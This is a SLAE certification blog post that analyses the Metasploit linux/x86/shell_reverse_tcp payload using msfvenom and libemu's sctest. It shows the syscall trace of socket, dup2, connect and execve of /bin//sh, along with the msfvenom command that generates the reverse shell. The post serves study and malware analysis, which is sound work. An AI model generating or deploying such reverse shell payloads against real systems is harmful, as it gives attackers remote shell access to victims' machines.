SLAE #5: linux/x86/shell_reverse_tcp

This post covers the analysis of the linux/x86/shell_reverse_tcp Metasploit payload.

One of the previous assignments of the SLAE series consisted in writing a reverse tcp shell spawning shellcode, so everything should look familiar.

Let’s start by listing the payload options.

$ msfvenom -p linux/x86/shell_reverse_tcp --payload-options
Options for payload/linux/x86/shell_reverse_tcp

       Name: Linux Command Shell, Reverse TCP Inline
     Module: payload/linux/x86/shell_reverse_tcp
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 190
       Rank: Normal

Provided by:
    Ramon de C Valle <>

Basic options:
Name   Current Setting  Required  Description
——   ———————  ————  —————
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port

  Connect back to attacker and spawn a command shell

I’ll use libemu instead of disassembling the shellcode with ndisasm. Libemu is a x86 emulation library that allows executing shellcode and profiling its behavior.

The sctest tool is part of the libemu test suite and can be used to run the shellcode. -S takes the input from STDIN. -s 10000 allows a large number of steps to run, so we make sure the shellcode completes its execution.

$ msfvenom -p linux/x86/shell_reverse_tcp LHOST= | sctest -vvv -S -s 10000
int socket (
     int domain = 2;
     int type = 1;
     int protocol = 0;
) =  14;
int dup2 (
     int oldfd = 14;
     int newfd = 2;
) =  2;
int dup2 (
     int oldfd = 14;
     int newfd = 1;
) =  1;
int dup2 (
     int oldfd = 14;
     int newfd = 0;
) =  0;
int connect (
     int sockfd = 14;
     struct sockaddr_in * serv_addr = 0x00416fbe => 
         struct   = {
             short sin_family = 2;
             unsigned short sin_port = 23569 (port=4444);
             struct in_addr sin_addr = {
                 unsigned long s_addr = -2063488832 (host=;
             char sin_zero = "       ";
     int addrlen = 102;
) =  0;
int execve (
     const char * dateiname = 0x00416fa6 => 
           = "/bin//sh";
     const char * argv[] = [
           = 0x00416f9e => 
               = 0x00416fa6 => 
                   = "/bin//sh";
           = 0x00000000 => 
     const char * envp[] = 0x00000000 => 
) =  0;

The output contains the exact same system calls that were analyzed in the second assignment.

The first operation that takes place is the socket creation. After that comes the dup2 call on STDIN, STDOUT, and STDERR. The connect system call connects the socket to the configured address and port, which is in this case. Once the socket is connected, execve spawns a shell.

sctest also allows saving a dot formatted callgraph to visualize the shellcode execution. It’s as easy as adding the -G command line argument. The dot file can then be converted to png.

$ dot -T png -o reverse_shell_callgraph.png

The resulting image helps to detect the dup2 loop and the exact order of execution at first sight. It can be particularly helpful when trying to understand long, complex shellcode.


This approach is much faster than disassembling the shellcode and dissecting each part.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID: SLAE-­651


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s